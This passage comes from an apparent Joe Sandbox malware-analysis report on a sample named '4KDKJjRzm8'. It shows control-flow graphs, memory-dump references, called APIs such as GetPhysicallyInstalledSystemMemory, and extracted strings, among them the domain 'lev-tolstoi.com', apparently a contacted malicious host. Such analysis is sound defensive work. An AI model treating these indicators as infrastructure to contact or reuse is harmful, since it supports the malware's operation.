                                                                                                                                                                                                                                                        control_flow_graph 656 991227-99123f 657 991241-991244 656->657 658 991280-9912ae call 981870 657->658 659 991246-99127e 657->659 662 9912b0-9912b3 658->662 659->657 663 9912fd-991327 call 981870 662->663 664 9912b5-9912fb 662->664 667 991329-991364 call 994850 663->667 668 99132b-99132f 663->668 664->662 676 991368-9913a9 call 987f50 call 98a8d0 667->676 677 991366 667->677 670 991d26-992744 call 981f30 668->670 686 9913ab-9913ae 676->686 677->676 687 9913fa-99141e call 981870 686->687 688 9913b0-9913f8 686->688 691 991420-991459 call 994850 687->691 692 991486-9914b6 call 994850 687->692 688->686 697 99145b 691->697 698 99145d-991481 call 987f50 call 98a8d0 691->698 699 9914b8 692->699 700 9914ba-99155f call 987f50 call 98a8d0 RtlExpandEnvironmentStrings 692->700 697->698 698->692 699->700 708 991562-991565 700->708 709 99156b-9915fa 708->709 710 9915ff-991615 708->710 709->708 711 99162d-991646 710->711 712 991617-991628 call 987f60 710->712 714 991648 711->714 715 99164a-9916ac call 987f50 711->715 712->670 714->715 721 9916db-991704 call 987f60 715->721 722 9916ae-9916d6 call 987f60 * 2 715->722 729 991706-991709 721->729 747 991d24 722->747 731 99170b-99173d 729->731 732 99173f-99175a call 981870 729->732 731->729 738 99175c-991788 call 994850 732->738 739 9917b6-9917d7 732->739 749 99178a 738->749 750 99178c-9917b4 call 987f50 call 98a8d0 738->750 741 9917da-9917dd 739->741 744 991818-99185e call 981b80 741->744 745 9917df-991816 741->745 753 991860-991863 744->753 745->741 747->670 749->750 750->739 755 9918b8-9918e5 call 981a80 753->755 756 991865-9918b6 753->756 761 9918ec-991930 call 981f30 755->761 762 9918e7 755->762 756->753 768 991932 761->768 769 991934-99194d call 987f50 761->769 763 991bf1-991c75 call 988b60 call 9957c0 762->763 773 991c7a-991c89 call 989780 763->773 768->769 774 99196f-991975 769->774 775 99194f-991956 769->775 783 991c8b-991c9a 773->783 784 991cc7-991cfa call 987f60 * 2 773->784 778 991977-991979 774->778 777 991958-991964 call 994980 775->777 791 991966-99196d 777->791 781 99197b-99197f 778->781 782 991984-9919c4 call 981f40 778->782 781->763 797 9919c6-9919c9 782->797 788 991c9c 783->788 789 991cb5-991cc5 call 987f60 783->789 815 991cfc-991cff call 987f60 784->815 816 991d04-991d0e 784->816 794 991c9e-991caf call 994b10 788->794 789->784 791->774 805 991cb1 794->805 806 991cb3 794->806 800 9919cb-991a0c 797->800 801 991a0e-991a55 call 981870 797->801 800->797 809 991a57-991a5a 801->809 805->794 806->789 811 991a79-991ac8 call 981870 809->811 812 991a5c-991a77 809->812 823 991aca-991acd 811->823 812->809 815->816 817 991d18-991d1f call 988c40 816->817 818 991d10-991d13 call 987f60 816->818 817->747 818->817 824 991acf-991af4 823->824 825 991af6-991b48 call 981b80 823->825 824->823 828 991b4a-991b4d 825->828 829 991b7c-991bec call 981b80 call 9949a0 828->829 830 991b4f-991b7a 828->830 829->778 830->828
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: )$+$>$@$F$L$[$`
                                                                                                                                                                                                                                                        • API String ID: 0-4163809010
                                                                                                                                                                                                                                                        • Opcode ID: a60b9b063dfefa45d68a67b6e3c601b56f9aa6b4c9540571bbf2a5bba0192fce
                                                                                                                                                                                                                                                        • Instruction ID: 6d3a328565c3f791c73348d3585728e28734ac361a5fee244813a321059da0f4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a60b9b063dfefa45d68a67b6e3c601b56f9aa6b4c9540571bbf2a5bba0192fce
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50528F7260C7818BD7249B3CC4953AEBBE1AFD5320F198E2EE5D9C7391D67889418B43
                                                                                                                                                                                                                                                        Function 0099C8A0 Relevance: 15.6, Strings: 12, Instructions: 585COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 835 99c8a0-99c8c3 836 99c8ca-99c8e4 835->836 837 99c975-99c99f 835->837 836->837 838 99c95a-99c96e 836->838 839 99c92d-99c948 call 99cfd0 836->839 840 99c8f0-99c926 836->840 841 99c9a0-99c9b2 837->841 838->837 838->838 838->839 838->840 844 99c94d-99c953 839->844 840->837 840->838 840->839 840->840 841->841 843 99c9b4-99ca1f call 994ca0 841->843 847 99ca20-99ca41 843->847 844->838 844->840 847->847 848 99ca43-99ca94 call 994ca0 847->848 851 99caa0-99cac5 848->851 851->851 852 99cac7-99cb4f call 994ca0 851->852 855 99cb50-99cbd1 852->855 855->855 856 99cbd7-99cc2a call 994ca0 855->856 859 99cc30-99cc4c 856->859 859->859 860 99cc4e-99cc88 call 994ca0 859->860 863 99cfba-99cfc1 860->863 864 99cfad-99cfb7 call 987f60 860->864 865 99cc8f-99cc97 860->865 866 99cf94-99cf9e call 987f60 860->866 867 99cfa7 860->867 864->863 868 99cca0-99cca9 865->868 866->867 867->864 868->868 872 99ccab-99ccb1 868->872 874 99ccba 872->874 875 99ccb3-99ccb8 872->875 876 99ccbd-99cd2f call 987f50 874->876 875->876 879 99cd30-99cd55 876->879 879->879 880 99cd57-99cd5f 879->880 881 99cd81-99cd8e 880->881 882 99cd61-99cd66 880->882 884 99cdb1-99cdc5 881->884 885 99cd90-99cd94 881->885 883 99cd70-99cd7f 882->883 883->881 883->883 886 99cdd0-99cdd9 884->886 887 99cda0-99cdaf 885->887 886->886 888 99cddb-99cde3 886->888 887->884 887->887 889 99cdf0-99cdf9 888->889 889->889 890 99cdfb-99ce0b 889->890 891 99ce0d-99ce12 890->891 892 99ce14-99ce16 890->892 893 99ce1d-99ce32 call 987f50 891->893 892->893 896 99ce51-99ce93 893->896 897 99ce34-99ce39 893->897 899 99cea0-99ced3 896->899 898 99ce40-99ce4f 897->898 898->896 898->898 899->899 900 99ced5-99cee2 899->900 901 99cf03 900->901 902 99cee4-99ceeb 900->902 904 99cf07-99cf14 901->904 903 99cef0-99ceff 902->903 903->903 905 99cf01 903->905 906 99cf33 904->906 907 99cf16-99cf1f 904->907 905->904 909 99cf37-99cf46 906->909 908 99cf20-99cf2f 907->908 908->908 910 99cf31 908->910 911 99cf50-99cf64 909->911 910->909 911->911 912 99cf66-99cf8c call 9a1b60 911->912 912->866
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "nl$#M%O$*"$4UW$\701$\701$a`|v$wt$AC$MO$pv$uvw
                                                                                                                                                                                                                                                        • API String ID: 0-635595044
                                                                                                                                                                                                                                                        • Opcode ID: 2c3e2a7b2352fda1e19f010fb5c5554f0e44b8022c5e77a42d83e787c13e4dd7
                                                                                                                                                                                                                                                        • Instruction ID: 0125c0b4efeff116419a4472be6b090db71b9ae1826b54647436fdf6fc90f77a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c3e2a7b2352fda1e19f010fb5c5554f0e44b8022c5e77a42d83e787c13e4dd7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE02DFB690C3008BD7049F69D8916ABBBF1EFD6314F198D2CE4C58B351E234DA09DB96
                                                                                                                                                                                                                                                        Function 009B8EA0 Relevance: 15.3, Strings: 12, Instructions: 287COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 915 9b8ea0-9b8ec3 916 9b8ec5-9b8ec8 915->916 917 9b8eca-9b8f2e 916->917 918 9b8f30-9b8f50 916->918 917->916 919 9b8f52-9b8f55 918->919 920 9b8f57-9b8fb4 919->920 921 9b8fb6-9b8fba 919->921 920->919 922 9b8fbc-9b8fc7 921->922 923 9b8fcb-9b8fe4 922->923 924 9b8fc9 922->924 926 9b8fe8-9b8ff3 923->926 927 9b8fe6 923->927 925 9b9036-9b9039 924->925 930 9b903b 925->930 931 9b903d-9b9042 925->931 928 9b9028-9b902d 926->928 929 9b8ff5-9b9023 call 9be110 926->929 927->928 933 9b902f 928->933 934 9b9031-9b9034 928->934 929->928 930->931 935 9b9048-9b9068 931->935 936 9b9264-9b9271 931->936 933->925 934->922 937 9b906a-9b906d 935->937 939 9b906f-9b90cc 937->939 940 9b90ce-9b90d2 937->940 939->937 941 9b90d4-9b90df 940->941 942 9b90e3-9b90fc 941->942 943 9b90e1 941->943 945 9b90fe 942->945 946 9b9100-9b910b 942->946 944 9b9160-9b9163 943->944 949 9b9167-9b9171 944->949 950 9b9165 944->950 947 9b914f-9b9154 945->947 946->947 948 9b910d-9b9145 call 9be110 946->948 954 9b9158-9b915b 947->954 955 9b9156 947->955 957 9b914a 948->957 951 9b9173 949->951 952 9b9175-9b917d 949->952 950->949 956 9b9180-9b91a0 951->956 952->956 954->941 955->944 958 9b91a2-9b91a5 956->958 957->947 959 9b9202-9b9206 958->959 960 9b91a7-9b9200 958->960 961 9b9208-9b920e 959->961 960->958 962 9b9212-9b9224 961->962 963 9b9210 961->963 965 9b9228-9b922e 962->965 966 9b9226 962->966 964 9b9262 963->964 964->936 967 9b9256-9b9259 965->967 968 9b9230-9b9252 call 9be110 965->968 966->967 969 9b925b 967->969 970 9b925d-9b9260 967->970 968->967 969->964 970->961
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: \$\$\$]$]$]$^$^$^$_$_$_
                                                                                                                                                                                                                                                        • API String ID: 0-1108506012
                                                                                                                                                                                                                                                        • Opcode ID: 639e33bd620422b7e8c30ed01bbbbaa4658ad9381579d666bd63a39d25843e75
                                                                                                                                                                                                                                                        • Instruction ID: d3c9d6726da5ada8c59628634fdd36dacfea35ddcdeda943e4d01762f3f48a73
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 639e33bd620422b7e8c30ed01bbbbaa4658ad9381579d666bd63a39d25843e75
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73B12971A1C3858FD3148A28CE843ABBFD297C6328F1D4B1DE5E5473C2C678C8459746
                                                                                                                                                                                                                                                        Function 0098CE45 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 342COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 973 98ce45-98ce78 call 9b3fd0 call 989780 CoUninitialize 978 98ce80-98cee4 973->978 978->978 979 98cee6-98cef7 978->979 980 98cf00-98cf20 979->980 980->980 981 98cf22-98cf64 980->981 982 98cf70-98cf92 981->982 982->982 983 98cf94-98cf9c 982->983 984 98cfbb-98cfc3 983->984 985 98cf9e-98cfa2 983->985 987 98cfdb-98cfe6 984->987 988 98cfc5-98cfc6 984->988 986 98cfb0-98cfb9 985->986 986->984 986->986 989 98d08a 987->989 990 98cfec-98cfed 987->990 991 98cfd0-98cfd9 988->991 993 98d08d-98d095 989->993 992 98cff0-98cff9 990->992 991->987 991->991 992->992 994 98cffb 992->994 995 98d0ad 993->995 996 98d097-98d09b 993->996 994->993 998 98d0b0-98d0bb 995->998 997 98d0a0-98d0a9 996->997 997->997 999 98d0ab 997->999 1000 98d0cb-98d0d7 998->1000 1001 98d0bd-98d0bf 998->1001 999->998 1003 98d0d9-98d0db 1000->1003 1004 98d0f1-98d1b1 1000->1004 1002 98d0c0-98d0c9 1001->1002 1002->1000 1002->1002 1006 98d0e0-98d0ed 1003->1006 1005 98d1c0-98d1d2 1004->1005 1005->1005 1008 98d1d4-98d1f4 1005->1008 1006->1006 1007 98d0ef 1006->1007 1007->1004 1009 98d200-98d252 1008->1009 1009->1009 1010 98d254-98d26b call 98b7e0 1009->1010 1012 98d270-98d28a 1010->1012
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Uninitialize
                                                                                                                                                                                                                                                        • String ID: 6=.)$<1!9$`{tu$lev-tolstoi.com
                                                                                                                                                                                                                                                        • API String ID: 3861434553-1386727196
                                                                                                                                                                                                                                                        • Opcode ID: 71f02ba3792af4a61b6deb5c8888006ed53cce5eb407e587994da2c2a59cc196
                                                                                                                                                                                                                                                        • Instruction ID: 078db6214cf0a7fb9097c7354b45f202d313be402c7b2ec04b65c7868079ea26
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71f02ba3792af4a61b6deb5c8888006ed53cce5eb407e587994da2c2a59cc196
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1A136B52057818FD716CF29D4D0A62BFE2FF96310B18859CC4D28F79AD339A846CB61
                                                                                                                                                                                                                                                        Function 00988600 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 356COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1018 988600-988611 call 9bd9a0 1021 988a48-988a4f ExitProcess 1018->1021 1022 988617-98861e call 9b62a0 1018->1022 1025 988a31-988a38 1022->1025 1026 988624-98864a 1022->1026 1027 988a3a-988a40 call 987f60 1025->1027 1028 988a43 call 9be080 1025->1028 1034 98864c-98864e 1026->1034 1035 988650-98887f 1026->1035 1027->1028 1028->1021 1034->1035 1037 988880-9888ce 1035->1037 1037->1037 1038 9888d0-98891d call 9bc540 1037->1038 1041 988920-988943 1038->1041 1042 988964-98897c 1041->1042 1043 988945-988962 1041->1043 1045 988a0d-988a25 call 989d00 1042->1045 1046 988982-988a0b 1042->1046 1043->1041 1045->1025 1049 988a27 call 98cb90 1045->1049 1046->1045 1051 988a2c call 98b7b0 1049->1051 1051->1025
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 00988A4A
                                                                                                                                                                                                                                                          • Part of subcall function 0098B7B0: FreeLibrary.KERNEL32(00988A31), ref: 0098B7B6
                                                                                                                                                                                                                                                          • Part of subcall function 0098B7B0: FreeLibrary.KERNEL32 ref: 0098B7D7
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FreeLibrary$ExitProcess
                                                                                                                                                                                                                                                        • String ID: b]u)$}$}
                                                                                                                                                                                                                                                        • API String ID: 1614911148-2900034282
                                                                                                                                                                                                                                                        • Opcode ID: 8a8683e7b98a1097ae084fa7e1d5ce61f0bb9be4eedac7a548921f596b1307bd
                                                                                                                                                                                                                                                        • Instruction ID: f7ce5342558c051db2561b43b4cad47ff337f737504519008f1021b89b601902
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a8683e7b98a1097ae084fa7e1d5ce61f0bb9be4eedac7a548921f596b1307bd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65C1E673A187144BC718EF69C84125AF7D6ABC4710F0EC52EA898EB395EA74DC058BC5
                                                                                                                                                                                                                                                        Function 009AD34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1069 9ad34a-9ad362 1070 9ad370-9ad382 1069->1070 1070->1070 1071 9ad384-9ad389 1070->1071 1072 9ad39b-9ad3a7 1071->1072 1073 9ad38b-9ad38f 1071->1073 1075 9ad3a9-9ad3ab 1072->1075 1076 9ad3c1-9ad40f call 9bfe00 GetPhysicallyInstalledSystemMemory 1072->1076 1074 9ad390-9ad399 1073->1074 1074->1072 1074->1074 1077 9ad3b0-9ad3bd 1075->1077 1081 9ad410-9ad44d 1076->1081 1077->1077 1079 9ad3bf 1077->1079 1079->1076 1081->1081 1082 9ad44f-9ad498 call 99e960 1081->1082 1085 9ad4a0-9ad551 1082->1085 1085->1085 1086 9ad557-9ad55c 1085->1086 1087 9ad55e-9ad568 1086->1087 1088 9ad57d-9ad583 1086->1088 1089 9ad570-9ad579 1087->1089 1090 9ad586-9ad58e 1088->1090 1089->1089 1091 9ad57b 1089->1091 1092 9ad5ab-9ad5b3 1090->1092 1093 9ad590-9ad591 1090->1093 1091->1090 1095 9ad5cb-9ad611 1092->1095 1096 9ad5b5-9ad5b6 1092->1096 1094 9ad5a0-9ad5a9 1093->1094 1094->1092 1094->1094 1098 9ad620-9ad653 1095->1098 1097 9ad5c0-9ad5c9 1096->1097 1097->1095 1097->1097 1098->1098 1099 9ad655-9ad65a 1098->1099 1100 9ad65c-9ad65d 1099->1100 1101 9ad66d 1099->1101 1102 9ad660-9ad669 1100->1102 1103 9ad670-9ad67a 1101->1103 1102->1102 1104 9ad66b 1102->1104 1105 9ad68b-9ad73c 1103->1105 1106 9ad67c-9ad67f 1103->1106 1104->1103 1107 9ad680-9ad689 1106->1107 1107->1105 1107->1107
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 009AD3EE
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InstalledMemoryPhysicallySystem
